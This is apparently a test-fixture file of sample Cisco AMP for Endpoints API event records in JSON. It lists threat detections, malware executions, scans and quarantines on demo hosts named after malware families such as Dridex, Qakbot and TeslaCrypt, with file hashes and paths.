Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":2692,"disposition":"Malicious","file_name":"jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":148000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984839","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":117000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984838","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1960,"disposition":"Clean","file_name":"IEXPLORE.EXE","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":39000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984837","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1960,"disposition":"Clean","file_name":"IEXPLORE.EXE","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":7000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659217662017540","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659217662018000,"timestamp":1610704809,"timestamp_nanoseconds":867000000,"date":"2021-01-15T10:00:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659217662017539","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899966001000,"timestamp":1610704801,"timestamp_nanoseconds":966000000,"date":"2021-01-15T10:00:01+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.GenericKD:N.18fd.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704801,"start_date":"2021-01-15T10:00:01+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a"},"parent":{"disposition":"Clean","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395844000300,"timestamp":1610704800,"timestamp_nanoseconds":844000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.Variant:Stabuniq.15nx.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704800,"start_date":"2021-01-15T10:00:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207750431900000,"timestamp":1610704800,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207750431899653","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659179007312000,"timestamp":1610704800,"timestamp_nanoseconds":445000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659179007311874","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659179007312000,"timestamp":1610704800,"timestamp_nanoseconds":414000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659179007311873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":3276,"disposition":"Malicious","file_name":"stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254540350751000,"timestamp":1610704800,"timestamp_nanoseconds":844000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254540350750721","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159246968074797000,"timestamp":1610704800,"timestamp_nanoseconds":355000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159246968074797057","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3372C1EDAB46837F1E973164FA2D72","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\3372C1EDAB46837F1E973164FA2D72","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3168,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663665717641000,"timestamp":1610704800,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663665717641217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":1604,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827054281638806000,"timestamp":1610704800,"timestamp_nanoseconds":664000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1335,"scanned_processes":24,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832265790660805000,"timestamp":1610704800,"timestamp_nanoseconds":44000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825614900658962000,"timestamp":1610704800,"timestamp_nanoseconds":406000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826707183856779000,"timestamp":1610704800,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832363037310321000,"timestamp":1610704800,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":189474725,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 